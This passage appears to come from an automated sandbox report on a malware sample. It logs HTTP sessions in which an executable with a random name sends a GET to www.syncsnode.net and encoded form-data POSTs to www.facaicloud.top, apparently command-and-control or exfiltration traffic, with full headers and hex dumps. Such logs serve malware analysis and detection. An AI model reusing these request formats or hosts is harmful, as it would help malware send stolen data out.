                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=SWScyADBcLDZcbufyB+/EuXvyJlLDjOv358Lt+wbT80fhfojCEooJHl8LVCldk15DAQPM3q5HkHYiPErsNJHdsDNUfVXRTNOqJTAlHObrwIG+jCA31j4VGpfs3M+YfggNYMNcI6j17807L2j3wALQvJdXNfmbUNL5LH4vopSXpyQ5AUbGxZR62qklG5ffTq6kahcCP5CRNrO/T+EZvHk2ae+DH6jcpWu5+YUFZeMm9vuS/N18qFhZH+QKQ52KgIZcwVru9aRt/q0xKtxpyF+KbizDWDNJ0an5jlql7cpImo0UVpKlTLtydkYUJnf0fqBlzahRZslORimV8FQAZwFLyWLIDIPFaONPdUR9KeYU79h7ca9Zt1uwiQuOQDJjLRdYky3WYDHeT/2LT57/zJfXFo/RxbPoFmXb/jplHQ1abFBAOQ/OfMreZtHoaq+wl65CnZsDx/fny/sXHl1g5HeQjag5XAeeZhokU4fbh6iP4Oo5+a1l7F1FfYSacxLa/UADD3xBPWC04B5tz4O05HAIv+9ayGMPeQO6ZKl3yGt4DO5HxHE3ReeU34rdRI2NlV/WjqWk95l1D6M/30IJsrFu1xdr5M4H1Qe09OX3UffxBMOhzDb5LR+bRXK/wkPRgBVlMGgkG+c/fmFaAHQTnGv+rygtP5glTTV6w7qL7xh5YvJ53XnmKr8Y3W0CqKm40Zp1mvhwBXPewQMbgpgNewmmL8MwaHeETkQ+Eoi4TlxfGsKpQm0uWSqC3jbScHOrAGKsKp88Gm2LDztFKGnOahZAy6bI7b03I0u3i7Gl7mqZ78Cv9h/Ml6oUry7DVQGbs2GgBi/OqS+1PTGUncluEy4wg27xYiDeXzxMgs2EQXQ4X98FPmgA5ULx97eDyIAfDEcxpxS1sEErtjLBDoTfFxIA1qpmpOD2RLWreqpTOcFoPIkAj7FWAnxYByEfMvTnPwV190A8RoCp8/svySnxBVYKX8AaQty7P9jm00fQf5HoPw [TRUNCATED]
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:48.782198906 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:09:48 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANaOv9XQTsyoFef80Srr98h8tnv5IEidnHrfJyXerFhjMAMr%2BGjWYXCuW2tcmwHSVVBFU2Hp%2B%2FXt60%2FjLOBmjae7J55Nx6c4yybP6iZAo%2BHl4MfOAZlnsG6VtaHQkvzdPD%2FSmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8d0f16317e2b0cc0-EWR
                                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:48.782293081 CEST219INData Raw: 41 20 a3 25 f8 b1 13 ef f2 f5 32 37 c5 ee 7d dd d1 29 0d 4a 48 9a 2b c8 17 c5 fc a2 b4 dd ed d6 f0 b4 e4 9b db f7 a0 6d 40 5e aa b0 f3 ed 9d a7 a3 34 67 70 34 a3 47 09 dd 19 a0 11 af 71 89 55 0b ca e3 b0 4f 14 b3 ab b2 6c 9e e7 8d d1 8c c1 21 4a
                                                                                                                                                                                                                                    Data Ascii: A %27})JH+m@^4gp4GqUOl!J^mz:d=f_;vmaDr%O?Wc+`vN3+ cD]'4v70uBb.
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:48.782619953 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    4192.168.2.549989172.67.218.106803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:50.579787016 CEST555OUTGET /t97r/?BHNhDJjp=fU68x3PRULyXXLX18Be8OZjG7cRSBQSavMkIge0xVdkIxqx/cDskQThzDXmmTxAsHWtrBQPcDxz3o7UBkP1yUbLOTohuYgETqqTp8AigyDVY+hGioDWRRBsptVM6QvNfSQ==&KteDo=fX0Hm8kxa HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.syncsnode.net
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:51.371690989 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:09:51 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lal2CfZ5zm7NZgWlogiN555ysaYl6I77Px0eouK%2FlNhXpDJfybchTpxGH6c0s72ZcnH2fYn%2Bnq6LvptKDzJar2WBaiFqSc6GB3DUxZoVT4YdBY%2FN3xYfeg%2FOOT4Iv0H%2BJCS3yQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8d0f1641c94318bc-EWR
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; f
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:51.371757984 CEST754INData Raw: 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74
                                                                                                                                                                                                                                    Data Ascii: ont-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    5192.168.2.54999074.48.31.123803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:56.893328905 CEST816OUTPOST /fxh3/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.facaicloud.top
                                                                                                                                                                                                                                    Origin: http://www.facaicloud.top
                                                                                                                                                                                                                                    Referer: http://www.facaicloud.top/fxh3/
                                                                                                                                                                                                                                    Content-Length: 209
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 65 65 31 6a 32 55 37 74 42 71 73 50 71 78 68 4c 58 78 64 63 77 6c 50 35 50 48 75 4f 76 65 31 38 62 4a 49 57 58 31 63 61 61 6b 6b 4a 2f 32 30 6e 65 4d 6a 46 77 53 37 2f 4d 66 32 7a 6d 54 66 2f 51 62 2f 4e 42 5a 4b 65 32 41 33 42 59 6c 5a 65 79 35 58 37 6d 50 57 38 6a 52 54 71 59 74 6c 41 38 53 74 4d 66 35 37 2f 61 72 4c 51 65 54 32 6e 36 57 53 54 63 5a 45 51 49 4e 54 41 4a 56 46 2f 63 67 66 6f 34 4e 77 77 35 63 41 58 45 6e 39 33 46 74 41 44 66 5a 35 34 7a 73 72 56 66 38 58 42 55 2f 79 5a 4c 6c 35 53 33 5a 6d 4b 4a 33 44 31 37 73 6d 6c 66 72 4e 37 56 72 76 4f 64 41 6c 43 46 65 39 30 47 53 77 3d
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=ee1j2U7tBqsPqxhLXxdcwlP5PHuOve18bJIWX1caakkJ/20neMjFwS7/Mf2zmTf/Qb/NBZKe2A3BYlZey5X7mPW8jRTqYtlA8StMf57/arLQeT2n6WSTcZEQINTAJVF/cgfo4Nww5cAXEn93FtADfZ54zsrVf8XBU/yZLl5S3ZmKJ3D17smlfrN7VrvOdAlCFe90GSw=
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:57.535053015 CEST858INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Cache-Control: no-cache, private
                                                                                                                                                                                                                                    date: Fri, 11 Oct 2024 13:09:57 GMT
                                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                                    Data Raw: 32 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 c9 72 db 30 0c bd e7 2b 18 f6 90 8b 19 d9 69 ea c9 a8 92 7b e8 72 4c 3b 93 5e 7a a4 49 48 62 43 91 1a 92 de da e9 bf 97 4b 64 cb 96 ba e8 22 51 00 1e 1e 1e 40 14 d7 1f 3e bf ff fa ed cb 47 d4 b8 56 ae ae 8a f0 42 92 aa ba c4 a0 f0 ea 0a f9 a7 68 80 f2 f4 19 8f 2d 38 8a 58 43 8d 05 57 e2 8d ab c8 c3 8b e7 c9 ac 68 0b 25 de 0a d8 75 da 38 8c 98 56 0e 94 77 df 09 ee 9a 92 c3 56 30 20 f1 30 43 42 09 27 a8 24 96 51 09 e5 c2 83 c5 bc 11 cd 09 27 61 f5 a8 1d fa a4 37 8a 17 59 fa 31 f0 b8 26 c4 db 94 b3 88 90 01 4b 29 d4 33 32 20 4b cc 95 25 9d 81 0a 1c 6b 30 6a fc 57 89 b3 ac 0a 21 b7 b5 75 d4 09 76 cb 74 3b ac 21 06 27 cf c6 b9 ce e6 47 7f ad 6b 09 b4 13 36 84 64 cc da 77 15 6d 85 3c 94 8f 1b 5f 85 c6 29 a5 75 07 09 b6 01 70 67 c5 04 aa 4f d1 74 ce 35 ba 9f b8 87 c2 43 23 66 68 ad f9 01 fd 3c aa d1 ab b2 a6 ec b9 36 41 0f c2 b4 d4 26 47 af aa aa 7a 3b f2 eb 8d cb d7 cb f5 72 c2 1e 34 20 89 7f 8e 6e 52 05 37 33 64 a9 57 cc 82 11 7f 0a d9 81 a8 1b 97 a3 c5 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: 258Tr0+i{rL;^zIHbCKd"Q@>GVBh-8XCWh%u8VwV0 0CB'$Q'a7Y1&K)32 K%k0jW!uvt;!'Gk6dwm<_)upgOt5C#fh<6A&Gz;r4 nR73dW|>NflnESGCFJ&K=a~LQ)jE(y)sa;I9<}cqq.iuq0O~Bpi0km8bR=Z>!N? Gwnr.To<Nz-XK)J)JN"";"\b8f&s2\'#22Xw(/`+2\Y_/IS$$*/s0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    6192.168.2.54999174.48.31.123803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:59.436171055 CEST836OUTPOST /fxh3/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.facaicloud.top
                                                                                                                                                                                                                                    Origin: http://www.facaicloud.top
                                                                                                                                                                                                                                    Referer: http://www.facaicloud.top/fxh3/
                                                                                                                                                                                                                                    Content-Length: 229
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 65 65 31 6a 32 55 37 74 42 71 73 50 72 51 52 4c 56 51 64 63 32 46 50 32 52 58 75 4f 31 75 31 34 62 4a 30 57 58 30 59 4b 61 58 41 4a 2b 54 49 6e 51 75 4c 46 6c 53 37 2f 44 2f 32 4d 72 7a 66 30 51 62 7a 76 42 59 6d 65 32 41 54 42 59 6e 42 65 7a 49 58 38 6d 66 57 2b 36 42 54 73 46 64 6c 41 38 53 74 4d 66 39 54 56 61 72 54 51 64 6a 47 6e 72 44 79 51 57 35 45 50 59 74 54 41 65 46 46 37 63 67 65 4e 34 49 59 61 35 66 30 58 45 6e 4e 33 45 35 30 41 46 4a 35 2b 33 73 72 4b 63 75 79 64 53 38 71 33 4e 6b 67 37 75 50 69 56 42 68 75 66 68 4f 75 4e 4d 4c 68 44 46 34 6e 35 4d 77 45 72 66 39 74 45 59 46 6e 4e 42 35 46 75 46 72 71 67 79 78 42 35 54 69 32 75 66 58 4d 65
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=ee1j2U7tBqsPrQRLVQdc2FP2RXuO1u14bJ0WX0YKaXAJ+TInQuLFlS7/D/2Mrzf0QbzvBYme2ATBYnBezIX8mfW+6BTsFdlA8StMf9TVarTQdjGnrDyQW5EPYtTAeFF7cgeN4IYa5f0XEnN3E50AFJ5+3srKcuydS8q3Nkg7uPiVBhufhOuNMLhDF4n5MwErf9tEYFnNB5FuFrqgyxB5Ti2ufXMe
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:00.054867029 CEST858INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Cache-Control: no-cache, private
                                                                                                                                                                                                                                    date: Fri, 11 Oct 2024 13:09:59 GMT
                                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                                    Data Raw: 32 35 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 54 c9 72 db 30 0c bd e7 2b 18 f6 90 8b 19 d9 69 ea c9 a8 92 7b e8 72 4c 3b 93 5e 7a a4 49 48 62 43 91 1a 92 de da e9 bf 97 4b 64 cb 96 ba e8 22 51 00 1e 1e 1e 40 14 d7 1f 3e bf ff fa ed cb 47 d4 b8 56 ae ae 8a f0 42 92 aa ba c4 a0 f0 ea 0a f9 a7 68 80 f2 f4 19 8f 2d 38 8a 58 43 8d 05 57 e2 8d ab c8 c3 8b e7 c9 ac 68 0b 25 de 0a d8 75 da 38 8c 98 56 0e 94 77 df 09 ee 9a 92 c3 56 30 20 f1 30 43 42 09 27 a8 24 96 51 09 e5 c2 83 c5 bc 11 cd 09 27 61 f5 a8 1d fa a4 37 8a 17 59 fa 31 f0 b8 26 c4 db 94 b3 88 90 01 4b 29 d4 33 32 20 4b cc 95 25 9d 81 0a 1c 6b 30 6a fc 57 89 b3 ac 0a 21 b7 b5 75 d4 09 76 cb 74 3b ac 21 06 27 cf c6 b9 ce e6 47 7f ad 6b 09 b4 13 36 84 64 cc da 77 15 6d 85 3c 94 8f 1b 5f 85 c6 29 a5 75 07 09 b6 01 70 67 c5 04 aa 4f d1 74 ce 35 ba 9f b8 87 c2 43 23 66 68 ad f9 01 fd 3c aa d1 ab b2 a6 ec b9 36 41 0f c2 b4 d4 26 47 af aa aa 7a 3b f2 eb 8d cb d7 cb f5 72 c2 1e 34 20 89 7f 8e 6e 52 05 37 33 64 a9 57 cc 82 11 7f 0a d9 81 a8 1b 97 a3 c5 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: 258Tr0+i{rL;^zIHbCKd"Q@>GVBh-8XCWh%u8VwV0 0CB'$Q'a7Y1&K)32 K%k0jW!uvt;!'Gk6dwm<_)upgOt5C#fh<6A&Gz;r4 nR73dW|>NflnESGCFJ&K=a~LQ)jE(y)sa;I9<}cqq.iuq0O~Bpi0km8bR=Z>!N? Gwnr.To<Nz-XK)J)JN"";"\b8f&s2\'#22Xw(/`+2\Y_/IS$$*/s0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    7192.168.2.54999274.48.31.123803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:01.984869003 CEST1853OUTPOST /fxh3/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.facaicloud.top
                                                                                                                                                                                                                                    Origin: http://www.facaicloud.top
                                                                                                                                                                                                                                    Referer: http://www.facaicloud.top/fxh3/
                                                                                                                                                                                                                                    Content-Length: 1245
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 65 65 31 6a 32 55 37 74 42 71 73 50 72 51 52 4c 56 51 64 63 32 46 50 32 52 58 75 4f 31 75 31 34 62 4a 30 57 58 30 59 4b 61 58 49 4a 2f 68 51 6e 51 50 4c 46 6a 69 37 2f 4b 66 32 4e 72 7a 66 31 51 62 72 72 42 59 37 6a 32 43 62 42 5a 43 64 65 36 61 76 38 74 66 57 2b 79 68 54 70 59 74 6c 76 38 54 42 49 66 35 33 56 61 72 54 51 64 68 75 6e 37 6d 53 51 46 70 45 51 49 4e 54 45 4a 56 45 6b 63 67 58 77 34 49 63 67 35 4a 45 58 64 48 64 33 4a 71 63 41 64 5a 35 38 77 73 71 66 63 75 4f 30 53 2f 4f 52 4e 6b 56 57 75 49 57 56 42 6c 58 56 34 66 57 4f 54 4a 74 79 58 70 65 5a 53 48 34 4d 65 50 64 49 59 48 62 56 4c 62 64 2b 48 73 71 43 78 52 59 2b 4e 55 69 38 5a 58 5a 6b 30 61 55 62 58 53 7a 74 66 75 48 57 48 2f 55 4c 2b 48 68 4c 6a 71 2b 33 78 5a 77 62 52 76 68 36 7a 42 33 64 4e 73 66 34 31 45 36 53 6f 4e 56 32 2b 6f 31 39 6f 45 43 77 69 65 45 6d 48 4f 59 2f 44 4e 74 58 46 36 66 64 5a 42 69 69 30 6a 36 72 71 69 70 54 79 6a 4b 4a 45 41 37 4b 42 6c 37 55 69 6a 43 54 77 58 4b 58 2f 72 34 59 6d [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=ee1j2U7tBqsPrQRLVQdc2FP2RXuO1u14bJ0WX0YKaXIJ/hQnQPLFji7/Kf2Nrzf1QbrrBY7j2CbBZCde6av8tfW+yhTpYtlv8TBIf53VarTQdhun7mSQFpEQINTEJVEkcgXw4Icg5JEXdHd3JqcAdZ58wsqfcuO0S/ORNkVWuIWVBlXV4fWOTJtyXpeZSH4MePdIYHbVLbd+HsqCxRY+NUi8ZXZk0aUbXSztfuHWH/UL+HhLjq+3xZwbRvh6zB3dNsf41E6SoNV2+o19oECwieEmHOY/DNtXF6fdZBii0j6rqipTyjKJEA7KBl7UijCTwXKX/r4YmV+QTxHrqI/awwolSRBLNtJMb4VZS2YzSz6pncRU2o6cutFJnFPOTbyHdTmHHlc+Rlq9zwWy56d7x6JJYct+Xw25Ot0Y/2vAyXorNl8RxJAmiHruYUrghxjBRAMeJYn9GSGrw6ZRxKjJgom9iTFdMf20gyXMCynbURE9j7cve/AIJbkDJBRL3LQ9Pn3t3xCF6cDH+0l3ejlcSNY0sVIUKTMSqa6ac3Kxk2o9eWg+RIcREbWPMav6817Qw+BL38se7IH734uC2Yj43zVrnl0r91OJkRnia3xyI10YBvw+jYtIW8hr1PirYMARiW6QIStBj5N+6KWDYwn5oxMKnKL1t/MP/9lrW//6yuecwTRwGZMF/gie758NxvSiPzWg3I6Ms7uWJBXp+9eEgFkl1ucT8wQaawotdFeZ52JlS0HMp6d8yoDoP4g7m33xY2hMNcYf/611AUXqTbsDUc3Z1wKmHkOWvAUwaoWVTwhqyYquZSfNeCjZZtv6W955Z+E9jdmNVaXjrhgpBW52Png0CJfxJB+FYzzEabZMzQ2wstyknpWkumDK0+GUt2hUbza4lDzkcuuo2gf4HX/Rn3HeHV4Lce2CRXrurRmcHJISS1esLvgc920rBgDb6XOCgWlXpG969TC5jprl4rr/nZ5wEcycX5mAHrjvM+eVWlP [TRUNCATED]
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:02.659430027 CEST858INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Cache-Control: no-cache, private
                                                                                                                                                                                                                                    date: Fri, 11 Oct 2024 13:10:02 GMT
                                                                                                                                                                                                                                    Content-Encoding: gzip
